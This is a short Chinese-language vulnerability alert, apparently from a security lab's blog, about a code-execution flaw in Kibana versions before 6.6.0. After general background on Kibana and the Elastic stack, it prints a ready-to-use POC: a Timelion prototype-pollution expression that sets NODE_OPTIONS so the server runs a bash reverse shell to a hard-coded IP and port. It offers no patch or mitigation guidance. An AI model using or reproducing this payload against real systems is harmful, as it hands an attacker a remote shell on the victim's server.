[漏洞预警] kibana < 6.6.0 代码执行漏洞

Posted 2021-04-21 聚源信息安全实验室

Kibana是Elasticsearch的开源数据可视化插件。它在Elasticsearch集群上索引的内容之上提供可视化功能。用户可以在大量数据之上创建条形图，折线图和散点图，或饼图和地图.
Kibana还提供了一个称为Canvas的演示工具，该工具使用户可以创建幻灯片平台，直接从Elasticsearch提取实时数据.
Elasticsearch，Logstash和Kibana的组合（称为“弹性堆栈”（以前称为“ ELK堆栈”））可以作为产品或服务获得. Logstash向Elasticsearch提供输入流以进行存储和搜索，而Kibana访问数据以进行可视化，例如仪表板.Elastic还提供了“ Beats”软件包，可以将其配置为提供有关各种数据库和应用程序技术的预制Kibana可视化效果和仪表板.

Kibana 的使用场景，应该集中在两方面：实时监控与问题分析。

滥用节点中的环境变量，以Kibana为例对RCE开发原型污染

POC:  kibana < 6.6.0 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')